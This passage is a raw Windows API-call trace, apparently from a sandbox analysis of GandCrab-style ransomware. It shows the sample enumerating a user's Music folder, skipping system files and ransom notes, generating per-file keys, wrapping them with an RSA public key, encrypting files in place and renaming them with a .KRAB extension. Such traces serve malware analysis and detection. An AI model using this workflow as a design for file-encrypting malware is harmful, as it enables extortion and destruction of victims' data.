lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\8Zaw0HvYd2tdk.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\8zaw0hvyd2tdk.wav.krab")) returned 1 [0093.300] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.301] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.301] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.301] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.301] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock" [0093.301] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.301] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 97 [0093.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\d2ca4a08d2ca4dee3d.lock") returned 92 [0093.301] lstrlenW (lpString=".lock") returned 5 [0093.301] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.302] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.302] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.302] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.302] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.302] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.302] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.302] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt" [0093.302] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.303] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt.KRAB") returned 90 [0093.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt") returned 85 [0093.303] lstrlenW (lpString=".txt") returned 4 [0093.303] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.303] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.303] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt") returned 85 [0093.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\KRAB-DECRYPT.txt") returned 85 [0093.303] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.303] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.303] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.303] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.303] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.308] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.308] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.308] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.308] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.308] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.308] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.308] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0093.308] lstrcmpW (lpString1="VOPWwMKh2.m4a", lpString2=".") returned 1 [0093.309] lstrcmpW (lpString1="VOPWwMKh2.m4a", lpString2="..") returned 1 [0093.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\", lpString2="VOPWwMKh2.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a" [0093.309] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.309] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a.KRAB") returned 87 [0093.309] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a") returned 82 [0093.309] lstrlenW (lpString=".m4a") returned 4 [0093.309] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.309] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.309] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a") returned 82 [0093.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a") returned 82 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="desktop.ini") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="autorun.inf") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="ntuser.dat") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="iconcache.db") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="bootsect.bak") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="boot.ini") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="ntuser.dat.log") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="thumbs.db") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="ntldr") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="NTDETECT.COM") returned 1 [0093.310] lstrcmpiW (lpString1="VOPWwMKh2.m4a", lpString2="Bootfont.bin") returned 1 [0093.310] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.310] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0093.311] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.311] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.311] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.312] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0093.312] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.312] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.312] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011678) returned 1 [0093.312] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.313] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.316] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.316] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0093.316] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0093.316] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.316] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0093.317] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0093.317] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.317] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.317] GetLastError () returned 0x0 [0093.317] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.317] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.317] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0093.318] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0093.318] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0093.318] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0093.318] GetLastError () returned 0x0 [0093.318] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.318] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.318] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\vopwwmkh2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0093.319] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.319] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.320] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xfa41, lpOverlapped=0x0) returned 1 [0093.334] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff05bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.334] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xfa41, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xfa41, lpOverlapped=0x0) returned 1 [0093.334] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0093.334] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.339] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.339] CloseHandle (hObject=0x43c) returned 1 [0093.339] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.340] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\vopwwmkh2.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\rsRZea_AFWnVh9JT\\VOPWwMKh2.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\rsrzea_afwnvh9jt\\vopwwmkh2.m4a.krab")) returned 1 [0093.341] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0093.341] FindClose (in: hFindFile=0xfbd620 | out: hFindFile=0xfbd620) returned 1 [0093.341] CloseHandle (hObject=0x734) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.342] lstrcmpW (lpString1="sFjg8TYOeS W71n.mp3", lpString2=".") returned 1 [0093.342] lstrcmpW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="..") returned 1 [0093.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\", lpString2="sFjg8TYOeS W71n.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3" [0093.342] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.342] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3.KRAB") returned 76 [0093.342] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3") returned 71 [0093.342] lstrlenW (lpString=".mp3") returned 4 [0093.342] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.343] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.343] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.343] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3") returned 71 [0093.343] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3") returned 71 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="desktop.ini") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="autorun.inf") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="ntuser.dat") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="iconcache.db") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="bootsect.bak") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="boot.ini") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="ntuser.dat.log") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="thumbs.db") returned -1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="ntldr") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="NTDETECT.COM") returned 1 [0093.343] lstrcmpiW (lpString1="sFjg8TYOeS W71n.mp3", lpString2="Bootfont.bin") returned 1 [0093.343] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.344] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011018) returned 1 [0093.344] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.345] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.345] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.345] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.345] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0093.345] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.345] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011238) returned 1 [0093.346] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.346] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.347] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.347] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.347] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0093.347] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.347] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.347] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0093.348] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.348] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.348] GetLastError () returned 0x0 [0093.348] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0093.348] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.348] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.348] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd620) returned 1 [0093.348] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.349] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.358] GetLastError () returned 0x0 [0093.358] CryptDestroyKey (hKey=0xfbd620) returned 1 [0093.358] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\sfjg8tyoes w71n.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0093.359] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.359] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.359] ReadFile (in: hFile=0x734, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x119df, lpOverlapped=0x0) returned 1 [0093.386] SetFilePointerEx (in: hFile=0x734, liDistanceToMove=0xfffee621, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.386] WriteFile (in: hFile=0x734, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x119df, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x119df, lpOverlapped=0x0) returned 1 [0093.387] WriteFile (in: hFile=0x734, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0093.387] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.391] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.392] CloseHandle (hObject=0x734) returned 1 [0093.392] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.392] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\sfjg8tyoes w71n.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\7tTH3KwoEqko2i\\sFjg8TYOeS W71n.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\7tth3kwoeqko2i\\sfjg8tyoes w71n.mp3.krab")) returned 1 [0093.393] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.394] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0093.394] FindClose (in: hFindFile=0xfbd560 | out: hFindFile=0xfbd560) returned 1 [0093.394] CloseHandle (hObject=0x3a8) returned 1 [0093.394] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.394] lstrcmpW (lpString1="CEC_ty9-ROAAa-lKe", lpString2=".") returned 1 [0093.394] lstrcmpW (lpString1="CEC_ty9-ROAAa-lKe", lpString2="..") returned 1 [0093.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="CEC_ty9-ROAAa-lKe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe" [0093.394] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\" [0093.394] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.394] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.395] SHGetSpecialFolderPathW (in: 